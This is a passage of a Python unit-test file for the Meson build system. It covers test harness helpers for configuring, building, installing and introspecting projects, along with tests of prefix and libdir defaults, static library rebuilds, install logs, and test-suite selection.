builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path; otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs, CI will just abort. It is very hard to distinguish
# between a CI issue and a test bug in that case. Set a timeout and fail
# loudly instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# use them as the command for each compile command in the parsed JSON.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list of the command lines run by Meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
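# confdata maps a variable name to what looks like a (value, description)
# pair; the point of the test is that do_conf_file keeps the original line
# endings (\n vs \r\n) when substituting @VAR@.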
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
prefix = '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
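# Comparing PurePath objects instead of raw strings makes the check
# tolerant of separator differences (e.g. on Windows, where 'a/b' and
# 'a\\b' compare equal).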
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
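        # An unqualified --setup name must exist in every (sub)project whose
        # tests are selected; prefixing it with 'project:' pins it to one project.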
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
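        # `meson test` exits with a return code equal to the number of failed
        # tests, so the expected failure count can be read straight from the
        # CalledProcessError (or asserted to be zero when the run succeeds).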
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
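        # The test project defines four failing tests spread across the main
        # project and its subprojects; each suite selection below is checked
        # against the number of failures it leaves enabled.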
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
            raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
